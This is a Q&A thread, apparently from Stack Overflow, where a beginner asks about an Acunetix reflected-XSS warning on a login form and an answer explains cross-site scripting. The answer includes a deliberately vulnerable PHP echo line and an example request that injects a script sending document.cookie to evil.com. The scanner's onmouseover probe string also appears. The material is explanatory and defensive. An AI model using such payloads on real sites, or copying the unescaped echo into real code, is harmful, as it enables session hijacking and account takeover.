# JavaScript Acunetix Security Scan Warning

Tags: javascript, html, authentication

Running Acunetix on my website shows the severe vulnerability below

URL encoded GET input username was set to " onmouseover=prompt(994492) bad=" The input is reflected inside a tag element between double quotes.

I have tried to figure out what could be done with this. I am fairly new to coding and am looking for some tips. What could be entered as a username that would be considered malicious? Wouldn't any code entered only be run on the client PC and not the server?

Examples? Solutions? Sorry, I just included what I believe it is referencing. Wouldn't it be bad to link to my site if it is in danger of being exploited?

```
<form name="loginForm" action="LoginName.asp" method="post">
  <fieldset>
  <label for="username">User</label>
  <input type="text" name="username" value=""/>
  <label for="password">Password</label>
  <input type="password" name="password"/>
  </fieldset>
  <input type="hidden" name="originalURL" value="">
  <input type="submit" value="Login" class="form-btn" />
</form>
```

It appears to not like the username or OriginalURL and says that "Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user."

Comment: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Answer (score 1):

What you have come across is a Cross-site Scripting (XSS) vulnerability.

XSS is a client-side vulnerability, so with regards to your question "Wouldn't any code entered only be run on the client PC and not the server?", the answer to the question is that it's actually run in the user's browser.

At first it might seem harmless, but XSS can have some serious consequences, especially when paired with other attacks such as phishing. XSS can be used for a number of nefarious things, including:

- Stealing browser cookies and therefore allowing the attacker to impersonate the user who is currently logged into an application
- Website defacement, or changing the layout of a page
- [Drive-by downloads](https://en.wikipedia.org/wiki/Drive-by_download)
- Pretty much anything you can do in a browser

Based on what Acunetix reported (`onmouseover=prompt(994492) bad=`) it sounds like an attacker can inject the `"` character into the value of an HTML attribute. I'll try to explain what I mean below with some sample PHP code.

```
// Vulnerable to Reflected XSS
echo '<div class="' . $_GET['c'] . '"></div>';
```

In the above example, a regular user would make a request like:

```
GET /test.php?c=blue HTTP/1.1
```

And it would result in the following being printed to the page:

```
<div class="blue"></div>
```

However an attacker could somehow convince a user (e.g. via phishing) to make the following request:

```
GET /test.php?c="><script>window.location='http://evil.com/?cookie=' + document.cookie</script> HTTP/1.1
```

This will result in:

```
<div class=""><script>window.location='http://evil.com/?cookie=' + document.cookie</script></div>
```

Once the victim makes that request, the attacker can copy the contents of the user's cookie and impersonate them (assuming the victim is logged in when the attacker steals the cookie).

For more information on what XSS is, I'd recommend taking a look at [this article](https://www.acunetix.com/websitesecurity/cross-site-scripting/), it's a bit introductory, but it should serve as a solid basis.

Additionally, I would also recommend reading [this article](http://excess-xss.com/#xss-prevention) with respect to fixing the XSS vulnerability.

Also, re " Wouldn't it be bad to link to my site if it is in danger of being exploited?" -- Better not, until you fix it at least :)